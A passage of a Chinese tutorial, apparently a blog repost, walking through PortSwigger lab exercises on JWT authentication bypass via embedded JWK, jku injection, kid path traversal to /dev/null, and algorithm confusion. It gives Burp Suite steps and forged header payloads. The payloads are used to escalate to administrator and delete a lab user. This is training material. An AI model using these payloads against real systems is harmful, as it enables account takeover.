    Step 7:刷新页面拦截到请求并将请求发送到Repeat模块

    jwt令牌(jwt是什么)

    Step 8:在Repeat模块,我们切换到JSON Web Token选项卡,修改JWT的有效负载将sub内容修改为administrator

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 9:点击\\”Attack\\”,然后选择\\”Embedded JWK\\”,出现提示时选择您新生成的RSA密钥

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 10:之后成功越权

    jwt令牌(jwt是什么)

    Step 11:调用敏感操作接口删除carlos用户完成解题

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    注入场景2

    有些服务器可以使用jku(jwk Set URL)头参数来引用包含密钥的JWK集,而不是直接使用JWK头参数来嵌入公钥,当验证签名时,服务器从这个URL获取相关的密钥,这里的JWK集其实是一个JSON对象,包含一个代表不同键的JWK数组,下面是一个简单的例子:

    {    \\\"keys\\\": [        {            \\\"kty\\\": \\\"RSA\\\",            \\\"e\\\": \\\"AQAB\\\",            \\\"kid\\\": \\\"75d0ef47-af89-47a9-9061-7c02a610d5ab\\\",            \\\"n\\\": \\\"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\\\"        },        {            \\\"kty\\\": \\\"RSA\\\",            \\\"e\\\": \\\"AQAB\\\",            \\\"kid\\\": \\\"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\\\",            \\\"n\\\": \\\"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\\\"        }    ]}

    JWK集合有时会通过一个标准端点公开,比如:/.well-known/jwks.json,更安全的网站只会从受信任的域获取密钥,但有时您可以利用URL解析差异来绕过这种过滤,下面我们通过一个靶场来实践以下
    靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection

    jwt令牌(jwt是什么)

    Step 1:首先点击上方的\\”ACCESS THE LAB\\”选项卡进入实验环境

    jwt令牌(jwt是什么)

    Step 2:登录系统

    jwt令牌(jwt是什么)

    Step 3:随后你会看到一个用户邮箱更新的表单

    jwt令牌(jwt是什么)

    Step 4:使用burpsuite生成一个新的RSA密钥

    {    \\\"p\\\": \\\"8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU\\\",    \\\"kty\\\": \\\"RSA\\\",    \\\"q\\\": \\\"1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8\\\",    \\\"d\\\": \\\"Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ\\\",    \\\"e\\\": \\\"AQAB\\\",    \\\"kid\\\": \\\"fa018615-0392-4d15-89bb-a2c637d9adbd\\\",    \\\"qi\\\": \\\"XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks\\\",    \\\"dp\\\": \\\"0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0\\\",    \\\"dq\\\": \\\"QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M\\\",    \\\"n\\\": \\\"ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w\\\"}

    jwt令牌(jwt是什么)

    Step 5:发送请求到repeat

    jwt令牌(jwt是什么)

    Step 6:复制公钥作为JWK

    {    \\\"kty\\\": \\\"RSA\\\",    \\\"e\\\": \\\"AQAB\\\",    \\\"kid\\\": \\\"fa018615-0392-4d15-89bb-a2c637d9adbd\\\",    \\\"n\\\": \\\"ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w\\\"}

    jwt令牌(jwt是什么)

    Step 7:在题目中选择\\”Go eo exploit server\\”,然后加上key头并保存到exploit的body中

    {   \\\"keys\\\": [       {           \\\"kty\\\": \\\"RSA\\\",           \\\"e\\\": \\\"AQAB\\\",           \\\"kid\\\": \\\"fa018615-0392-4d15-89bb-a2c637d9adbd\\\",           \\\"n\\\": \\\"ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w\\\"     }    ]}

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 8:然后切换至repeat的\\”JSON Web Token\\”界面,将kid修改成自己生成的JWK中的kid值,将jku的值改为exploit

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 9:切换sub为administrator

    jwt令牌(jwt是什么)

    Step 10:点击下面的sign,选择Don’t modify header模式

    jwt令牌(jwt是什么)

    Step 11:更改请求路径发送请求成功越权

    jwt令牌(jwt是什么)

    Step 12:请求敏感路径删除carlos用户

    jwt令牌(jwt是什么)

    Step 13:成功解题

    jwt令牌(jwt是什么)

    注入场景3

    服务器可能使用几个密钥来签署不同种类的数据,因此JWT的报头可能包含kid(密钥id)参数,这有助于服务器在验证签名时确定使用哪个密钥,验证密钥通常存储为一个JWK集,在这种情况下服务器可以简单地查找与令牌具有相同kid的JWK,然而JWS规范没有为这个ID定义具体的结构——它只是开发人员选择的任意字符串,例如:它们可能使用kid参数指向数据库中的特定条目,甚至是文件的名称,如果这个参数也容易受到目录遍历的攻击,攻击者可能会迫使服务器使用其文件系统中的任意文件作为验证密钥,例如:

    {    \\\"kid\\\": \\\"../../path/to/file\\\",    \\\"typ\\\": \\\"JWT\\\",    \\\"alg\\\": \\\"HS256\\\",    \\\"k\\\": \\\"asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc\\\"}

    如果服务器也支持使用对称算法签名的jwt就会特别危险,在这种情况下攻击者可能会将kid参数指向一个可预测的静态文件,然后使用与该文件内容匹配的秘密对JWT进行签名,从理论上讲您可以对任何文件这样做,但是最简单的方法之一是使用/dev/null,这在大多数Linux系统上都存在,由于这是一个空文件,读取它将返回一个空字符串,因此用空字符串对令牌进行签名将会产生有效的签名
    靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal

    jwt令牌(jwt是什么)

    Step 1:点击上方\\”Access The Lab\\”进入靶场

    jwt令牌(jwt是什么)

    Step 2:登录靶场

    jwt令牌(jwt是什么)

    Step 3:登录后进入到如下邮箱更新界面

    jwt令牌(jwt是什么)

    Step 4:使用burpsuite的插件生成一个对称密钥(Symmetric Key)并将k的值修改为\\”AA==\\”即为null

    {    \\\"kty\\\": \\\"oct\\\",    \\\"kid\\\": \\\"38576880-33b7-4446-ade4-f1a78bb6d5c2\\\",    \\\"k\\\": \\\"AA==\\\"}

    jwt令牌(jwt是什么)

    Step 5:拦截一个请求将其发送到repeat模块

    jwt令牌(jwt是什么)

    Step 6:此时直接访问/admin——提示\\”401 Unauthorized\\”

    jwt令牌(jwt是什么)

    Step 7:在JSON Web Token界面中修改kid值和sub进行目录遍历,这里的\\”/dev/null\\”文件名与\\”AA==\\”一致都为null,对称密钥,所以可以成功绕过

    {    \\\"kid\\\": \\\"../../../../../../../dev/null\\\",    \\\"alg\\\": \\\"HS256\\\"}

    jwt令牌(jwt是什么)

    Step 8:点击sign选择OCT8 的密钥攻击

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    Step 9:成功越权

    jwt令牌(jwt是什么)

    Step 10:调用敏感接口删除carlos用户完成解题

    jwt令牌(jwt是什么)

    jwt令牌(jwt是什么)

    JWT算法混淆
    算法混淆

    算法混淆攻击(也称为密钥混淆攻击)是指攻击者能够迫使服务器使用不同于网站开发人员预期的算法来验证JSON web令牌(JWT)的签名,这种情况如果处理不当,攻击者可能会伪造包含任意值的有效jwt而无需知道服务器的秘密签名密钥
    JWT可以使用一系列不同的算法进行签名,其中一些,例如:HS256(HMAC+SHA-256)使用\\”对称\\”密钥,这意味着服务器使用单个密钥对令牌进行签名和验证,显然这需要像密码一样保密

    jwt令牌(jwt是什么)

    其他算法,例如:RS256(RSA+SHA-256)使用\\”非对称\\”密钥对,它由一个私钥和一个数学上相关的公钥组成,私钥用于服务器对令牌进行签名,公钥可用于验证签名,顾名思义,私钥必须保密,但公钥通常是共享的,这样任何人都可以验证服务器发出的令牌的签名

    jwt令牌(jwt是什么)

    混淆攻击

    算法混乱漏洞通常是由于JWT库的实现存在缺陷而导致的,尽管实际的验证过程因所使用的算法而异,但许多库都提供了一种与算法无关的方法来验证签名,这些方法依赖于令牌头中的alg参数来确定它们应该执行的验证类型,下面的伪代码显示了一个简单的示例,说明了这个泛型verify()方法在JWT库中的声明

    function verify(token, secretOrPublicKey){    algorithm = token.getAlgHeader();    if(algorithm == \\\"RS256\\\"){        // Use the provided key as an RSA public key    } else if (algorithm == \\\"HS256\\\"){        // Use the provided key as an HMAC secret key    }}

    使用这种方法的网站开发人员认为它将专门处理使用RS256这样的非对称算法签名的JWT时,问题就出现了,由于这个有缺陷的假设他们可能总是传递一个固定的公钥给方法,如下所示:

      publicKey = <public-key-of-server>;token = request.getCookie(\\\"session\\\");verify(token, publicKey);

      在这种情况下如果服务器接收到使用对称算法(例如:HS256)签名的令牌,库通用verify()方法会将公钥视为HMAC密钥,这意味着攻击者可以使用HS256和公钥对令牌进行签名,而服务器将使用相同的公钥来验证签名(备注:用于签署令牌的公钥必须与存储在服务器上的公钥完全相同,这包括使用相同的格式(如X.509 PEM)并保留任何非打印字符,例如:换行符,在实践中您可能需要尝试不同的格式才能使这种攻击奏效)
      攻击流程简易视图如下:

      jwt令牌(jwt是什么)

      攻击演示

      靶场地址:https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion

      jwt令牌(jwt是什么)

      Step 1:点击\\”Access the lab\\”访问靶场

      jwt令牌(jwt是什么)

      Step 2:使用账户密码登录

      jwt令牌(jwt是什么)

      Step 3:登录之后进入到用户邮箱更新操作界面

      jwt令牌(jwt是什么)

      Step 4:服务器有时通过映射到/jwks.json或/.well-known/jwks.json的端点将它们的公钥公开为JSON Web Key(JWK)对象,比如大家熟知的/jwks.json,这些可能被存储在一个称为密钥的jwk数组中,这就是众所周知的JWK集合,即使密钥没有公开,您也可以从一对现有的jwt中提取它

      {    \\\"keys\\\": [        {            \\\"kty\\\": \\\"RSA\\\",            \\\"e\\\": \\\"AQAB\\\",            \\\"kid\\\": \\\"75d0ef47-af89-47a9-9061-7c02a610d5ab\\\",            \\\"n\\\": \\\"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\\\"        },        {            \\\"kty\\\": \\\"RSA\\\",            \\\"e\\\": \\\"AQAB\\\",            \\\"kid\\\": \\\"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\\\",            \\\"n\\\": \\\"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\\\"        }    ]}

      于是乎我们可以直接访问/jwks.json接口获取到服务器的公钥信息,在此处我们将JWK复制下来,作为我们第二部的RSA Key
      https://0aad003404004c0b817dcff9004c0050.web-security-academy.net/jwks.json

      {  \\\"keys\\\": [    {      \\\"kty\\\": \\\"RSA\\\",      \\\"e\\\": \\\"AQAB\\\",      \\\"use\\\": \\\"sig\\\",      \\\"kid\\\": \\\"63624c36-bfd8-4146-888e-6d032ad4fe18\\\",      \\\"alg\\\": \\\"RS256\\\",      \\\"n\\\": \\\"zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw\\\"    }  ]}

      jwt令牌(jwt是什么)

      Step 5:在Burpsuite的JWT Editor Keys中点击\\”New RSA Key\\”,用之前泄露的JWK而生成一个新的RSA Key

      {      \\\"kty\\\": \\\"RSA\\\",      \\\"e\\\": \\\"AQAB\\\",      \\\"use\\\": \\\"sig\\\",      \\\"kid\\\": \\\"63624c36-bfd8-4146-888e-6d032ad4fe18\\\",      \\\"alg\\\": \\\"RS256\\\",      \\\"n\\\": \\\"zsiIsVqAKSpOnOxMKrI0hT3p8m_NK3VoejFnt4Hx2CFzvJsZ4_9mmoIVwi_nXYr7NtNV7stOSS4MGzYdJ57t4v83B9h7uI1fdKSp-L-cisg31S0Wm5B_LDnvuABFMcShJ-DKTgEYfLHaG31JudlyJdnfgNIIa0XL-wbGh7Xshf8RtzR8FC2DfApX_-KXYNnHxnTKTPXl5unBgCxyny2n2CwoCIiYet7s7X1c3qhwktWk6xJTmvkrd85KBlDSyEjBhEPPXrbVfqo8sNxkY-E2FXIoPIt8m_VSXlsKyZpjpfXTJJZo_IqazAl1XBW6bjwWjxwee0Xbyt7M1_1dTKjaAw\\\"}

      jwt令牌(jwt是什么)

      Step 6:选中\\”Copy Public Key as PEM\\”,同时将其进行base64编码操作,保存一下得到的字符串(备注:上下的一串—–

      原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34321.html

      Like (0)
      七芒星实验室的头像七芒星实验室
      Previous 2024年4月12日
      Next 2024年4月12日

      相关推荐

      发表回复

      您的邮箱地址不会被公开。 必填项已用 * 标注